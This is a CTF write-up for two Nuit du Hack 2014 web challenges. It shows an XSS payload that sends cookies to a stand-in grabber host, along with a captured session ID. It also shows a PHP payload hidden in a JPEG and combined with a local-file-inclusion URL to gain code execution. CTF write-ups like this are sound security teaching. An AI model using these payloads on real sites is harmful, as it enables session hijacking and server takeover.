Nuit du Hack CTF Quals 2014 - Web100 and Web300 Writeup
Web100
The challenge give us a site where there is a page called ‘Flag’ but only administrato can read it. Once registered you can clearly see an XSS in zoom.php file and easy exploitable. There is also a contact form to email the administrator. Here we have to put our XSS: http://abitbol.nuitduhack.com/zoom.php?image=x" onerror=window.location=“http://cookiegrabber/cookie.php?c="%2bdocument.cookie asd=”
Paste this line in the contact form and submit. Now wait for some minutes and go on the cookie grabber’s grab file:
82.228.142.248 PHPSESSID=u1ugcmiijdvuqsf5vjgvsg0sk2
Got it, now just go and replace the cookie and read flag: Well done you lucky bastard! The flag is: IJustTookaHUGEMySQLDUMP
Web300
A gallery image is provided where you can upload png,jpg,etc.. images. If you download an image after it has been uploaded by the script you can see, just by cat’ing it, that has been created with gd-jpeg framework. The framework is known about a issue that allows you encoding php code into an image that will survive to the php gd functions modifications, so basically we can inject php code into the image (more explanation about this here: http://virtualabs.fr/Nasty-bulletproof-Jpegs-l). There is also LFI vulnerability in the lang parameter on index.php page. So arbitrary php code in image + LFI = RCE. Lets exploit it. Firstly we have to encode the php code we want into an image: in the URL i pasted before there is an interesting tool called bulletjpg.py that will create 100 images with different qualities that contains our payload. We have to pick up the right image with right quality but how to know which one is correct? If you download an image from the gallery you’ll at the top of the image after gd signature the quality that is 98. So running the script with this payload:
payloads = ['<?php $_GET["a"]($_GET["b"]("includes")) ?>']
after some time it will create a directory “exploit-jpg” that contains images like: exploit-80.jpg,exploit-90.jpg, etc.. and also exploit-98.jpg the one we need. Now upload it and then include it with:
http://gallery.nuitduhack.com/index.php?lang=../../../includes/exploit-98.jpg&a=var_dump&b=scandir
This will lead us to the content of “includes” directory that is:
[0]=>
string(1) "."
[1]=>
string(2) ".."
[2]=>
string(5) "1.jpg"
[3]=>
string(5) "2.jpg"
[4]=>
string(5) "3.png"
[5]=>
string(5) "4.png"
[6]=>
string(5) "5.png"
[7]=>
string(16) "X~unsuspicious~X"
[8]=>
string(14) "exploit-98.jpg"
[9]=>
string(18) "exploit-98.php.jpg"
[10]=>
string(4) "flag"
[11]=>
string(14) "header-eng.php"
[12]=>
string(13) "header-fr.php"
There is an interesting file there: XunsuspiciousX. Lets go throught it:
http://gallery.nuitduhack.com/includes/X~unsuspicious~X
Okay, it was a little suspicious .. Here is the flag: WhyAreHemorrhoidsNotCalledAssteroids
Razor4x